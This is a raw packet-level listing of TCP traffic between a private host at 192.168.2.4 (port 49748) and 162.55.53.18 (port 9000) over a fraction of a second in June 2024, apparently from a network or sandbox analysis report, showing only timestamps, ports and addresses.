Jun 19, 2024 14:40:17.017607927 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017649889 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017652988 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017671108 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017687082 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017703056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017710924 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017720938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017721891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017748117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017769098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017779112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017806053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017828941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017838001 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017844915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017860889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017878056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017882109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017894030 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017906904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017910957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.017931938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.017956972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018089056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018105984 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018121958 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018135071 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018138885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018155098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018157959 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018173933 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018189907 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018198967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018234968 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018250942 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018268108 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018284082 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018295050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018300056 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018321991 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018352032 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018356085 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018464088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018479109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018492937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018498898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018510103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018526077 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018528938 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018543005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018548965 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018560886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018572092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018578053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.018589973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018601894 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.018620014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.053807020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.053841114 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.053857088 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.053868055 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.053874016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.053881884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.053893089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.053900957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.053917885 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.053927898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.106353045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.106395006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.106426954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.106435061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.106453896 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.106456041 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.106472969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.106484890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.106498957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.106520891 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107620001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107655048 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107670069 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107672930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107707977 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107722044 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107738972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107754946 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107779980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107868910 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107872963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107891083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107907057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107913971 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107924938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107939005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107953072 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107964039 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.107980967 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.107996941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108019114 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108032942 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108087063 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108103991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108120918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108127117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108138084 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108141899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108156919 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108160973 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108175993 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108186960 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108323097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108340025 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108355999 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108362913 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108371973 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108376980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108390093 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108401060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108407974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108419895 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108431101 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108449936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108489990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108596087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108613014 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108627081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108643055 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108654976 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108659029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108669043 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108675003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108684063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108691931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108702898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108706951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108724117 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108732939 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108741045 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108747005 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108755112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108778000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108791113 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108928919 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108943939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108959913 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108974934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.108984947 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.108993053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109008074 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109009027 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109026909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109034061 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109055996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109081984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109199047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109215021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109230995 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109242916 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109246969 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109257936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109263897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109272957 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109282017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109292984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109299898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109304905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109318972 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109339952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109539986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109555960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109571934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109586000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109591961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109602928 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109611988 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109620094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109636068 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109639883 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109652042 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109652996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109671116 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109679937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109688044 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109694004 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109709024 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109716892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109721899 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.109746933 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.109770060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.144668102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.144691944 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.144707918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.144716024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.144732952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.144750118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197236061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197262049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197285891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197293997 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197309017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197314024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197328091 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197331905 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197343111 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197354078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197365046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.197371006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.197410107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198620081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198645115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198661089 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198672056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198683023 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198702097 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198770046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198785067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198800087 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198813915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198826075 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198829889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198857069 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198874950 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198900938 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198916912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198932886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198949099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.198957920 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.198982954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199002028 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199065924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199079990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199114084 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199126959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199151039 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199167013 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199193954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199218035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199317932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199332952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199352026 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199357986 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199372053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199377060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199397087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199409008 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199557066 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199588060 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199616909 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199629068 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199691057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199704885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199717999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199719906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199736118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199769020 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199829102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199842930 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199857950 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199872971 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199882984 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199896097 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199933052 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.199955940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.199985981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200001955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200016975 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200023890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200032949 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200046062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200047016 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200062037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200072050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200077057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200105906 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200120926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200305939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200341940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200351954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200356960 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200372934 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200390100 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200403929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200403929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200407982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200421095 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200426102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200438976 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200443983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200468063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200489044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200720072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200735092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200750113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200763941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200767994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200779915 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200792074 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200795889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200812101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200814962 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200826883 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200838089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200843096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200859070 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200861931 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200874090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200890064 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200891018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200906038 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200911045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200922966 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200936079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200939894 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200954914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200965881 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.200973034 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.200980902 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.201009035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.201214075 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.201277971 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.235369921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.235388041 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.235403061 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.235428095 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.235451937 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.287893057 CEST	9000	49748	162.55.53.18	192.168.2.4
